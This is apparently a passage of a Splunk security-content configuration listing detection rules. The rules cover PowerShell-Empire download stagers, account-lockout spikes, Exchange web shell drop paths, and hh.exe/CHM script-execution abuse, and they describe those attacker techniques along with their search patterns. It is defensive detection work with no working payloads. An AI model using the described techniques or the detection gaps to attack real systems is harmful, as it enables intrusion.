action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Empire with PowerShell Script Block Logging - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Malicious PowerShell", "Hermetic Wiper", "Data Destruction"] action.risk = 1 action.risk.param._risk_message = The following behavior was identified and typically related to PowerShell-Empire on $Computer$ by $UserID$. action.risk.param._risk = [{"risk_object_field": "UserID", "risk_object_type": "user", "risk_score": 81}, {"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 81}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect Empire with PowerShell Script Block Logging - Rule action.correlationsearch.annotations = {"analytic_story": ["Malicious PowerShell", "Hermetic Wiper", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 90, "impact": 90, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \ This analytic identifies the common PowerShell stager used by PowerShell-Empire. Each stager that may use PowerShell all uses the same pattern. The initial HTTP will be base64 encoded and use `system.net.webclient`. Note that some obfuscation may evade the analytic. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.notable.param.rule_title = Detect Empire with PowerShell Script Block Logging action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 (ScriptBlockText=*system.net.webclient* AND ScriptBlockText=*frombase64string*) | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_empire_with_powershell_script_block_logging_filter` [ESCU - Detect Excessive Account Lockouts From Endpoint - Rule] action.escu = 0 action.escu.enabled = 1 description = This search identifies endpoints that have caused a relatively high number of account lockouts in a short period. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.002"], "nist": ["DE.AE"]} action.escu.data_models = ["Change"] action.escu.eli5 = This search identifies endpoints that have caused a relatively high number of account lockouts in a short period. action.escu.how_to_implement = You must ingest your Windows security event logs in the `Change` datamodel under the nodename is `Account_Management`, for this search to execute successfully. Please consider updating the cron schedule and the count of lockouts you want to monitor, according to your environment. \ **Splunk>Phantom Playbook Integration**\ If Splunk>Phantom is also configured in your environment, a Playbook called "Excessive Account Lockouts Enrichment and Response" can be configured to run when any results are found by this detection search. The Playbook executes the Contextual and Investigative searches in this Story, conducts additional information gathering on Windows endpoints, and takes a response action to shut down the affected endpoint. To use this integration, install the Phantom App for Splunk `https://splunkbase.splunk.com/app/3411/`, add the correct hostname to the "Phantom Instance" field in the Adaptive Response Actions when configuring this detection search, and set the corresponding Playbook to active. \ (Playbook Link:`https://my.phantom.us/4.1/playbook/excessive-account-lockouts-enrichment-and-response/`).\ action.escu.known_false_positives = It's possible that a widely used system, such as a kiosk, could cause a large number of account lockouts. action.escu.creation_date = 2024-03-19 action.escu.modification_date = 2024-03-19 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Excessive Account Lockouts From Endpoint - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Active Directory Password Spraying"] action.risk = 1 action.risk.param._risk_message = Multiple accounts have been locked out. Review $dest$ and results related to $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 36}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 36}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect Excessive Account Lockouts From Endpoint - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Password Spraying"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.002"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(All_Changes.user) as user from datamodel=Change.All_Changes where All_Changes.result="*lock*" by All_Changes.dest All_Changes.result |`drop_dm_object_name("All_Changes")` |`drop_dm_object_name("Account_Management")`| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | search count > 5 | `detect_excessive_account_lockouts_from_endpoint_filter` [ESCU - Detect Excessive User Account Lockouts - Rule] action.escu = 0 action.escu.enabled = 1 description = This search detects user accounts that have been locked out a relatively high number of times in a short period. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.003"], "nist": ["DE.AE"]} action.escu.data_models = ["Change"] action.escu.eli5 = This search detects user accounts that have been locked out a relatively high number of times in a short period. action.escu.how_to_implement = ou must ingest your Windows security event logs in the `Change` datamodel under the nodename is `Account_Management`, for this search to execute successfully. Please consider updating the cron schedule and the count of lockouts you want to monitor, according to your environment. action.escu.known_false_positives = It is possible that a legitimate user is experiencing an issue causing multiple account login failures leading to lockouts. action.escu.creation_date = 2024-03-19 action.escu.modification_date = 2024-03-19 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Excessive User Account Lockouts - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Active Directory Password Spraying"] action.risk = 1 action.risk.param._risk_message = Excessive user account lockouts for $user$ in a short period of time action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 36}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect Excessive User Account Lockouts - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Password Spraying"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.003"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Change.All_Changes where All_Changes.result="*locked out*" by All_Changes.user All_Changes.result |`drop_dm_object_name("All_Changes")` |`drop_dm_object_name("Account_Management")`| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | search count > 5 | `detect_excessive_user_account_lockouts_filter` [ESCU - Detect Exchange Web Shell - Rule] action.escu = 0 action.escu.enabled = 1 description = The following query identifies suspicious .aspx created in 3 paths identified by Microsoft as known drop locations for Exchange exploitation related to HAFNIUM group and recently disclosed vulnerablity named ProxyShell and ProxyNotShell. Paths include: `\HttpProxy\owa\auth\`, `\inetpub\wwwroot\aspnet_client\`, and `\HttpProxy\OAB\`. Upon triage, the suspicious .aspx file will likely look obvious on the surface. inspect the contents for script code inside. Identify additional log sources, IIS included, to review source and other potential exploitation. It is often the case that a particular threat is only applicable to a specific subset of systems in your environment. Typically analytics to detect those threats are written without the benefit of being able to only target those systems as well. Writing analytics against all systems when those behaviors are limited to identifiable subsets of those systems is suboptimal. Consider the case ProxyShell vulnerability on Microsoft Exchange Servers. With asset information, a hunter can limit their analytics to systems that have been identified as Exchange servers. A hunter may start with the theory that the exchange server is communicating with new systems that it has not previously. If this theory is run against all publicly facing systems, the amount of noise it will generate will likely render this theory untenable. However, using the asset information to limit this analytic to just the Exchange servers will reduce the noise allowing the hunter to focus only on the systems where this behavioral change is relevant. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Delivery"], "mitre_attack": ["T1505", "T1505.003", "T1190", "T1133"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following query identifies suspicious .aspx created in 3 paths identified by Microsoft as known drop locations for Exchange exploitation related to HAFNIUM group and recently disclosed vulnerablity named ProxyShell and ProxyNotShell. Paths include: `\HttpProxy\owa\auth\`, `\inetpub\wwwroot\aspnet_client\`, and `\HttpProxy\OAB\`. Upon triage, the suspicious .aspx file will likely look obvious on the surface. inspect the contents for script code inside. Identify additional log sources, IIS included, to review source and other potential exploitation. It is often the case that a particular threat is only applicable to a specific subset of systems in your environment. Typically analytics to detect those threats are written without the benefit of being able to only target those systems as well. Writing analytics against all systems when those behaviors are limited to identifiable subsets of those systems is suboptimal. Consider the case ProxyShell vulnerability on Microsoft Exchange Servers. With asset information, a hunter can limit their analytics to systems that have been identified as Exchange servers. A hunter may start with the theory that the exchange server is communicating with new systems that it has not previously. If this theory is run against all publicly facing systems, the amount of noise it will generate will likely render this theory untenable. However, using the asset information to limit this analytic to just the Exchange servers will reduce the noise allowing the hunter to focus only on the systems where this behavioral change is relevant. action.escu.how_to_implement = To successfully implement this search you need to be ingesting information on process that include the name of the process responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Processes` node and `Filesystem` node. action.escu.known_false_positives = The query is structured in a way that `action` (read, create) is not defined. Review the results of this query, filter, and tune as necessary. It may be necessary to generate this query specific to your endpoint product. action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Exchange Web Shell - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["ProxyNotShell", "ProxyShell", "CISA AA22-257A", "HAFNIUM Group", "BlackByte Ransomware"] action.risk = 1 action.risk.param._risk_message = A file - $file_name$ was written to disk that is related to IIS exploitation previously performed by HAFNIUM. Review further file modifications on endpoint $dest$ by user $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 81}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 81}, {"risk_object_field": "file_name", "risk_object_type": "other", "risk_score": 81}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect Exchange Web Shell - Rule action.correlationsearch.annotations = {"analytic_story": ["ProxyNotShell", "ProxyShell", "CISA AA22-257A", "HAFNIUM Group", "BlackByte Ransomware"], "cis20": ["CIS 10"], "confidence": 90, "impact": 90, "kill_chain_phases": ["Installation", "Delivery"], "mitre_attack": ["T1505", "T1505.003", "T1190", "T1133"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following query identifies suspicious .aspx created in 3 paths identified by Microsoft as known drop locations for Exchange exploitation related to HAFNIUM group and recently disclosed vulnerablity named ProxyShell and ProxyNotShell. Paths include: `\HttpProxy\owa\auth\`, `\inetpub\wwwroot\aspnet_client\`, and `\HttpProxy\OAB\`. Upon triage, the suspicious .aspx file will likely look obvious on the surface. inspect the contents for script code inside. Identify additional log sources, IIS included, to review source and other potential exploitation. It is often the case that a particular threat is only applicable to a specific subset of systems in your environment. Typically analytics to detect those threats are written without the benefit of being able to only target those systems as well. Writing analytics against all systems when those behaviors are limited to identifiable subsets of those systems is suboptimal. Consider the case ProxyShell vulnerability on Microsoft Exchange Servers. With asset information, a hunter can limit their analytics to systems that have been identified as Exchange servers. A hunter may start with the theory that the exchange server is communicating with new systems that it has not previously. If this theory is run against all publicly facing systems, the amount of noise it will generate will likely render this theory untenable. However, using the asset information to limit this analytic to just the Exchange servers will reduce the noise allowing the hunter to focus only on the systems where this behavioral change is relevant. action.notable.param.rule_title = Detect Exchange Web Shell action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where Processes.process_name=System by _time span=1h Processes.process_id Processes.process_name Processes.dest Processes.user | `drop_dm_object_name(Processes)` | join process_guid, _time [| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_path IN ("*\\HttpProxy\\owa\\auth\\*", "*\\inetpub\\wwwroot\\aspnet_client\\*", "*\\HttpProxy\\OAB\\*") Filesystem.file_name IN( "*.aspx", "*.ashx") by _time span=1h Filesystem.user Filesystem.dest Filesystem.file_create_time Filesystem.file_name Filesystem.file_path | `drop_dm_object_name(Filesystem)` | fields _time dest user file_create_time file_name file_path process_name process_path process] | dedup file_create_time | table dest user file_create_time, file_name, file_path, process_name | `detect_exchange_web_shell_filter` [ESCU - Detect HTML Help Renamed - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies a renamed instance of hh.exe (HTML Help) executing a Compiled HTML Help (CHM). This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The "htm" and "html" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Validate it is the legitimate version of hh.exe by reviewing the PE metadata. hh.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.001"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies a renamed instance of hh.exe (HTML Help) executing a Compiled HTML Help (CHM). This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The "htm" and "html" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Validate it is the legitimate version of hh.exe by reviewing the PE metadata. hh.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Although unlikely a renamed instance of hh.exe will be used legitimately, filter as needed. action.escu.creation_date = 2022-04-07 action.escu.modification_date = 2022-04-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect HTML Help Renamed - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious Compiled HTML Activity", "Living Off The Land"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect HTML Help Renamed - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Compiled HTML Activity", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.001"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name!=hh.exe AND Processes.original_file_name=HH.EXE by Processes.dest Processes.user Processes.parent_process_name Processes.original_file_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_html_help_renamed_filter` [ESCU - Detect HTML Help Spawn Child Process - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) that spawns a child process. This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The "htm" and "html" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review child process events and investigate further. hh.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.001"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) that spawns a child process. This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The "htm" and "html" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review child process events and investigate further. hh.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Although unlikely, some legitimate applications (ex. web browsers) may spawn a child process. Filter as needed. action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect HTML Help Spawn Child Process - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious Compiled HTML Activity", "Living Off The Land", "AgentTesla"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ spawning a child process, typically not normal behavior. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect HTML Help Spawn Child Process - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Compiled HTML Activity", "Living Off The Land", "AgentTesla"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) that spawns a child process. This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The "htm" and "html" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review child process events and investigate further. hh.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.notable.param.rule_title = Detect HTML Help Spawn Child Process action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=hh.exe by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_html_help_spawn_child_process_filter` [ESCU - Detect HTML Help URL in Command Line - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) file from a remote url. This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The "htm" and "html" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review reputation of remote IP and domain. Some instances, it is worth decompiling the .chm file to review its original contents. hh.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.001"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) file from a remote url. This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The "htm" and "html" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review reputation of remote IP and domain. Some instances, it is worth decompiling the .chm file to review its original contents. hh.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Although unlikely, some legitimate applications may retrieve a CHM remotely, filter as needed. action.escu.creation_date = 2021-09-16 action.escu.modification_date = 2021-09-16 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect HTML Help URL in Command Line - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious Compiled HTML Activity", "Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ contacting a remote destination to potentally download a malicious payload. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 90}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 90}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 90}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 90}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect HTML Help URL in Command Line - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Compiled HTML Activity", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 100, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) file from a remote url. This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The "htm" and "html" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review reputation of remote IP and domain. Some instances, it is worth decompiling the .chm file to review its original contents. hh.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.notable.param.rule_title = Detect HTML Help URL in Command Line action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_hh` Processes.process=*http* by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process Processes.original_file_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_html_help_url_in_command_line_filter` [ESCU - Detect HTML Help Using InfoTech Storage Handlers - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) file using InfoTech Storage Handlers. This particular technique will load Windows script code from a compiled help file, using InfoTech Storage Handlers. itss.dll will load upon execution. Three InfoTech Storage handlers are supported - ms-its, its, mk:@MSITStore. ITSS may be used to launch a specific html/htm file from within a CHM file. CHM files may contain nearly any file type embedded. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The "htm" and "html" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. hh.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.001"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) file using InfoTech Storage Handlers. This particular technique will load Windows script code from a compiled help file, using InfoTech Storage Handlers. itss.dll will load upon execution. Three InfoTech Storage handlers are supported - ms-its, its, mk:@MSITStore. ITSS may be used to launch a specific html/htm file from within a CHM file. CHM files may contain nearly any file type embedded. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The "htm" and "html" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. hh.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = It is rare to see instances of InfoTech Storage Handlers being used, but it does happen in some legitimate instances. Filter as needed. action.escu.creation_date = 2021-09-16 action.escu.modification_date = 2021-09-16 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect HTML Help Using InfoTech Storage Handlers - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious Compiled HTML Activity", "Living Off The Land"] action.risk = 1 action.risk.param._risk_message = 